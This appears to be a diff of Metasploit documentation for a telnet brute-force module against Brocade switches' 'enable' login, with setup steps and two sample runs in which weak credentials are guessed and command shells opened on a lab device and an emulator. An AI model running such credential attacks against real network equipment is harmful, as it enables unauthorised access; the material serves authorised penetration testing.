|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + This module is a login bruteforcer against Brocade network device's `enable` feature. |
| 4 | + |
| 5 | +To configure the device in a vulnerable fashion, follow these steps: |
| 6 | + 1. Set authentication mode via: `aaa authentication enable default local` |
| 7 | + |
| 8 | +This module works against `enable` so we want to ensure telnet itself has no auth |
| 9 | + **The following should not be set**: `enable telnet authentication` |
| 10 | + |
| 11 | +This module has been verified against: |
| 12 | + 1. ICX6450-24 SWver 07.4.00bT311 |
| 13 | + 2. FastIron WS 624 SWver 07.2.02fT7e1 |
| 14 | + |
| 15 | +An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py) |
| 16 | + |
| 17 | +## Verification Steps |
| 18 | + |
| 19 | + 1. Install the emulator or device |
| 20 | + 2. Start msfconsole |
| 21 | + 3. Do: `use auxiliary/scanner/telnet/brocade_enable_login` |
| 22 | + 4. Create/set a password file: `set pass_file /<passwords.lst>` |
| 23 | + 5. If desired: `set user_as_pass true` |
| 24 | + 6. Do: `set rhosts <ip>` |
| 25 | + 7. Do: `run` |
| 26 | + 8. You should get a shell. |
| 27 | + |
| 28 | +## Scenarios |
| 29 | + |
| 30 | + Example run against ICX6450-24 SWver 07.4.00bT311 |
| 31 | + |
| 32 | +``` |
| 33 | +msf > use auxiliary/scanner/telnet/brocade_enable_login |
| 34 | +msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst |
| 35 | +pass_file => /passwords.lst |
| 36 | +msf auxiliary(brocade_enable_login) > set user_as_pass true |
| 37 | +user_as_pass => true |
| 38 | +msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1 |
| 39 | +rhosts => 192.168.50.1 |
| 40 | +msf auxiliary(brocade_enable_login) > run |
| 41 | +
|
| 42 | +[*] Attempting username gathering from config on 192.168.50.1 |
| 43 | + |
| 44 | + |
| 45 | + |
| 46 | +[*] Attempting username gathering from running-config on 192.168.50.1 |
| 47 | + |
| 48 | + |
| 49 | + |
| 50 | +[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin |
| 51 | +[*] Attempting to start session 192.168.50.1:23 with admin:admin |
| 52 | +[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500 |
| 53 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: ) |
| 54 | +[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read |
| 55 | +[*] Attempting to start session 192.168.50.1:23 with read:read |
| 56 | +[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500 |
| 57 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: ) |
| 58 | +[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port |
| 59 | +[*] Attempting to start session 192.168.50.1:23 with port:port |
| 60 | +[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500 |
| 61 | +[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: ) |
| 62 | +[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: ) |
| 63 | +[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: ) |
| 64 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: ) |
| 65 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: ) |
| 66 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: ) |
| 67 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: ) |
| 68 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: ) |
| 69 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: ) |
| 70 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 71 | +[*] Auxiliary module execution completed |
| 72 | +msf auxiliary(brocade_enable_login) > sessions -l |
| 73 | +
|
| 74 | +Active sessions |
| 75 | +=============== |
| 76 | +
|
| 77 | + Id Type Information Connection |
| 78 | + -- ---- ----------- ---------- |
| 79 | + 1 shell TELNET admin:admin (192.168.50.1:23) 192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1) |
| 80 | + 2 shell TELNET read:read (192.168.50.1:23) 192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1) |
| 81 | + 3 shell TELNET port:port (192.168.50.1:23) 192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1) |
| 82 | +
|
| 83 | +msf auxiliary(brocade_enable_login) > session -i 1 |
| 84 | +[-] Unknown command: session. |
| 85 | +msf auxiliary(brocade_enable_login) > sessions -i 1 |
| 86 | +[*] Starting interaction with 1... |
| 87 | +
|
| 88 | +show sessions ? |
| 89 | +Unrecognized command |
| 90 | +BR-telnet@FWS624 Router#show ? |
| 91 | + 802-1w Rapid Spanning tree IEEE 802.1w D10 status |
| 92 | + aaa Show TACACS+ and RADIUS server statistics |
| 93 | + access-list show IPv4 access-list information |
| 94 | + acl-on-arp Show ARP ACL filtering |
| 95 | + arp Arp table |
| 96 | + auth-mac-addresses MAC Authentication status |
| 97 | + batch Batch commands |
| 98 | + boot-preference System boot preference |
| 99 | + buffer-profile Displays active profile |
| 100 | + cable-diagnostics Show Cable Diagnostics |
| 101 | + chassis Power supply/fan/temperature |
| 102 | + clock System time and date |
| 103 | + configuration Configuration data in startup config file |
| 104 | + cpu-utilization CPU utilization rate |
| 105 | + debug Debug information |
| 106 | + default System default settings |
| 107 | + dot1x Dot1x information |
| 108 | + errdisable Errdisable status |
| 109 | + fdp CDP/FDP information |
| 110 | + flash Flash memory contents |
| 111 | + gvrp GVRP information |
| 112 | + inline inline power information |
| 113 | + interfaces Port status |
| 114 | +--More--, next page: Space, next line: Return key, quit: Control-c |
| 115 | + ip IP address setting |
| 116 | + ipv6 IP setting |
| 117 | + license Show license information |
| 118 | + link-aggregate 802.3ad Link Aggregation Information |
| 119 | + link-error-disable Link Debouncing Control |
| 120 | + link-keepalive Link Layer Keepalive |
| 121 | + lldp Link-Layer Discovery Protocol information |
| 122 | + local-userdb Local User Database information |
| 123 | + logging System log |
| 124 | + loop-detection loop detection status & disabled ports |
| 125 | + mac-address MAC address table |
| 126 | + media 1Gig/10G port media type |
| 127 | + memory System memory usage |
| 128 | + metro-ring Metro ring protocol information |
| 129 | + mirror Mirror ports |
| 130 | + module Module type and status |
| 131 | + monitor Monitor ports |
| 132 | + mstp show MSTP (IEEE 802.1s) information |
| 133 | + optic Optic Temperature and Power |
| 134 | + port Show port security |
| 135 | + priority-mapping 802.1Q tagged priority setting |
| 136 | + processes Active process statistics |
| 137 | + protected-link-group Show Protected Link Group Details |
| 138 | +--More--, next page: Space, next line: Return key, quit: Control-c |
| 139 | + ptrace Global ptrace information |
| 140 | + qd-buffer-profile User configured buffer/descriptor profiles |
| 141 | + qos-profiles QOS configuration |
| 142 | + qos-tos IPv4 ToS based QoS |
| 143 | + radius show radius server debug info |
| 144 | + rate-limit Rate-limiting table and actions |
| 145 | + redundancy Display management redundancy details |
| 146 | + relative-utilization Relative utilization list |
| 147 | + reload Scheduled system reset |
| 148 | + reserved-vlan-map Reserved VLAN map status |
| 149 | + rmon Rmon status |
| 150 | + running-config Current running-config |
| 151 | + scheduler-profile User configured scheduling profiles |
| 152 | + sflow sFlow information |
| 153 | + snmp SNMP statistics |
| 154 | + sntp Show SNTP |
| 155 | + span Spanning tree status |
| 156 | + statistics Packet statistics |
| 157 | + stp-bpdu-guard BPDU Guard status |
| 158 | + stp-group Spanning Tree Group Membership |
| 159 | + stp-protect-ports Show stp-protect enabled ports and their BPDU drop |
| 160 | + counters |
| 161 | + table-mac-vlan MAC Based VLAN status |
| 162 | +--More--, next page: Space, next line: Return key, quit: Control-c |
| 163 | + tech-support System snap shot for tech support |
| 164 | + telnet Telnet connection |
| 165 | + topology-group Topology Group Membership |
| 166 | + traffic-policy Show traffic policy definition |
| 167 | + trunk Show trunk status |
| 168 | + users User accounts |
| 169 | + v6-l4-acl-sessions Show IPv6 software sessions |
| 170 | + version System status |
| 171 | + vlan VLAN status |
| 172 | + vlan-group VLAN Group Membership |
| 173 | + voice-vlan Show voice vlan |
| 174 | + vsrp Show VSRP commands |
| 175 | + web-connection Current web connections |
| 176 | + webauth web authentication information |
| 177 | + who User login |
| 178 | + | Output modifiers |
| 179 | + <cr> |
| 180 | +BR-telnet@FWS624 Router# |
| 181 | +``` |
| 182 | + |
| 183 | + Example run against emulator mentioned above: |
| 184 | + |
| 185 | +``` |
| 186 | +msf > use auxiliary/scanner/telnet/brocade_enable_login |
| 187 | +msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1 |
| 188 | +rhosts => 127.0.0.1 |
| 189 | +msf auxiliary(brocade_enable_login) > set user_as_pass true |
| 190 | +user_as_pass => true |
| 191 | +msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst |
| 192 | +pass_file => /passwords.lst |
| 193 | +msf auxiliary(brocade_enable_login) > run |
| 194 | +
|
| 195 | +[*] Attempting username gathering from config on 127.0.0.1 |
| 196 | + |
| 197 | + |
| 198 | + |
| 199 | +[*] Attempting username gathering from running-config on 127.0.0.1 |
| 200 | + |
| 201 | +[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: ) |
| 202 | +[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: ) |
| 203 | +[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: ) |
| 204 | +[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password |
| 205 | +[*] Attempting to start session 127.0.0.1:23 with username:password |
| 206 | +[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500 |
| 207 | +[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: ) |
| 208 | +[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon |
| 209 | +[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon |
| 210 | +[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500 |
| 211 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: ) |
| 212 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: ) |
| 213 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: ) |
| 214 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: ) |
| 215 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: ) |
| 216 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: ) |
| 217 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: ) |
| 218 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: ) |
| 219 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: ) |
| 220 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: ) |
| 221 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: ) |
| 222 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: ) |
| 223 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: ) |
| 224 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: ) |
| 225 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: ) |
| 226 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: ) |
| 227 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: ) |
| 228 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: ) |
| 229 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 230 | +[*] Auxiliary module execution completed |
| 231 | +msf auxiliary(brocade_enable_login) > sessions -l |
| 232 | +
|
| 233 | +Active sessions |
| 234 | +=============== |
| 235 | +
|
| 236 | + Id Type Information Connection |
| 237 | + -- ---- ----------- ---------- |
| 238 | + 1 shell TELNET username:password (127.0.0.1:23) 127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1) |
| 239 | + 2 shell TELNET ttrogdon:ttrogdon (127.0.0.1:23) 127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1) |
| 240 | +
|
| 241 | +msf auxiliary(brocade_enable_login) > |
| 242 | +``` |
0 commit comments